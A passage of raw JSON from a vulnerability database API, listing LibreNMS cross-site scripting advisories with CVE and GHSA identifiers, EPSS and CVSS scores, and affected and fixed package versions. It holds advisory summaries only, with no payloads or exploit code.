o/api/packages/66945?format=json","purl":"pkg:composer/librenms/librenms@23.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-4980","GHSA-qxrq-376q-p39h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n5u3-c21p-ukas"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56194?format=json","vulnerability_id":"VCID-ncgs-c7tb-gbfg","summary":"LibreNMS has a Persistent XSS from Insecure Input Sanitization Affects Multiple Endpoints\nThe application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50355","reference_id":"","reference_type":"","scores":[{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24787","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24669","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.2466","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24718","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00085","scoring_system":"epss","scoring_elements":"0.24775","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50355"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/bb4731419b592867bf974dde525e536606a52976","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:05:39Z/"}],"url":"https://github.com/librenms/librenms/commit/bb4731419b592867bf974dde525e536606a52976"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50355","reference_id":"CVE-2024-50355","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50355"},{"reference_url":"https://github.com/advisories/GHSA-4m5r-w2rq-q54q","reference_id":"GHSA-4m5r-w2rq-q54q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4m5r-w2rq-q54q"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-4m5r-w2rq-q54q","reference_id":"GHSA-4m5r-w2rq-q54q","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:05:39Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-4m5r-w2rq-q54q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-50355","GHSA-4m5r-w2rq-q54q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ncgs-c7tb-gbfg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46035?format=json","vulnerability_id":"VCID-nyn8-7mkk-zbb3","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in librenms/librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4978","reference_id":"","reference_type":"","scores":[{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00346","published_at":"2026-06-07T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00344","published_at":"2026-06-09T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00343","published_at":"2026-06-08T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00351","published_at":"2026-06-05T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00352","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4978"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/e4c46a45364cb944b94abf9b83f0558b2c4c2fb7","reference_id":"","reference_type":"","scores":[{"value":"9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:29:04Z/"}],"url":"https://github.com/librenms/librenms/commit/e4c46a45364cb944b94abf9b83f0558b2c4c2fb7"},{"reference_url":"https://huntr.dev/bounties/cefd9295-2053-4e6e-a130-7e1f845728f4","reference_id":"","reference_type":"","scores":[{"value":"9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:29:04Z/"}],"url":"https://huntr.dev/bounties/cefd9295-2053-4e6e-a130-7e1f845728f4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4978","reference_id":"CVE-2023-4978","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4978"},{"reference_url":"https://github.com/advisories/GHSA-qjpw-rg56-jh8v","reference_id":"GHSA-qjpw-rg56-jh8v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qjpw-rg56-jh8v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66945?format=json","purl":"pkg:composer/librenms/librenms@23.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-4978","GHSA-qjpw-rg56-jh8v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.1","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nyn8-7mkk-zbb3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56200?format=json","vulnerability_id":"VCID-pksv-nv1a-sqev","summary":"LibreNMS has a Reflected XSS ('Cross-site Scripting') in librenms/includes/functions.php\nA Reflected Cross-Site Scripting (XSS) vulnerability in the \"section\" parameter of the \"logs\" tab of a device allows attackers to inject arbitrary JavaScript. This vulnerability results in the execution of malicious code when a user accesses the page with a malicious \"section\" parameter, potentially compromising their session and enabling unauthorized actions. The issue arises from a lack of sanitization in the \"report_this()\" function.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50351","reference_id":"","reference_type":"","scores":[{"value":"0.01067","scoring_system":"epss","scoring_elements":"0.78069","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01067","scoring_system":"epss","scoring_elements":"0.78078","published_at":"2026-06-06T12:55:00Z"},{"value":"0.01067","scoring_system":"epss","scoring_elements":"0.78075","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01067","scoring_system":"epss","scoring_elements":"0.78072","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01067","scoring_system":"epss","scoring_elements":"0.78057","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50351"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/6a14a9bd767c6e452e4df77a24126c3eeb93dcbf","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T17:19:51Z/"}],"url":"https://github.com/librenms/librenms/commit/6a14a9bd767c6e452e4df77a24126c3eeb93dcbf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50351","reference_id":"CVE-2024-50351","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50351"},{"reference_url":"https://github.com/advisories/GHSA-v7w9-63xh-6r3w","reference_id":"GHSA-v7w9-63xh-6r3w","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v7w9-63xh-6r3w"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-v7w9-63xh-6r3w","reference_id":"GHSA-v7w9-63xh-6r3w","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T17:19:51Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-v7w9-63xh-6r3w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-50351","GHSA-v7w9-63xh-6r3w"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pksv-nv1a-sqev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56207?format=json","vulnerability_id":"VCID-qhpe-7ws8-kqb7","summary":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Port Settings\" page allows authenticated users to inject arbitrary JavaScript through the \"name\" parameter when creating a new Port Group. This vulnerability results in the execution of malicious code when the \"Port Settings\" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50350","reference_id":"","reference_type":"","scores":[{"value":"0.00936","scoring_system":"epss","scoring_elements":"0.76578","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00936","scoring_system":"epss","scoring_elements":"0.76563","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00936","scoring_system":"epss","scoring_elements":"0.76573","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00936","scoring_system":"epss","scoring_elements":"0.76584","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-50350"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:45:19Z/"}],"url":"https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50350","reference_id":"CVE-2024-50350","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-50350"},{"reference_url":"https://github.com/advisories/GHSA-xh4g-c9p6-5jxg","reference_id":"GHSA-xh4g-c9p6-5jxg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xh4g-c9p6-5jxg"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-xh4g-c9p6-5jxg","reference_id":"GHSA-xh4g-c9p6-5jxg","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:45:19Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-xh4g-c9p6-5jxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-50350","GHSA-xh4g-c9p6-5jxg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qhpe-7ws8-kqb7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110149?format=json","vulnerability_id":"VCID-qqnn-43db-guek","summary":"Cross-site Scripting in librenms/librenms\nA user is able to enable their own account if it was disabled by an admin while the user still holds a valid session. Moreover, the username is not properly sanitized in the admin user overview. This enables an XSS attack that enables an attacker with a low privilege user to execute arbitrary JavaScript in the context of an admin's account.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4068","reference_id":"","reference_type":"","scores":[{"value":"0.50253","scoring_system":"epss","scoring_elements":"0.97889","published_at":"2026-06-07T12:55:00Z"},{"value":"0.50253","scoring_system":"epss","scoring_elements":"0.97888","published_at":"2026-06-09T12:55:00Z"},{"value":"0.50253","scoring_system":"epss","scoring_elements":"0.9789","published_at":"2026-06-08T12:55:00Z"},{"value":"0.50253","scoring_system":"epss","scoring_elements":"0.97884","published_at":"2026-06-04T12:55:00Z"},{"value":"0.50253","scoring_system":"epss","scoring_elements":"0.97887","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4068"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/09a2977adb8bc4b1db116c725d661160c930d3a1","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-25T18:58:11Z/"}],"url":"https://github.com/librenms/librenms/commit/09a2977adb8bc4b1db116c725d661160c930d3a1"},{"reference_url":"https://huntr.dev/bounties/becfecc4-22a6-4f94-bf83-d6030b625fdc","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L"},{"value":"7.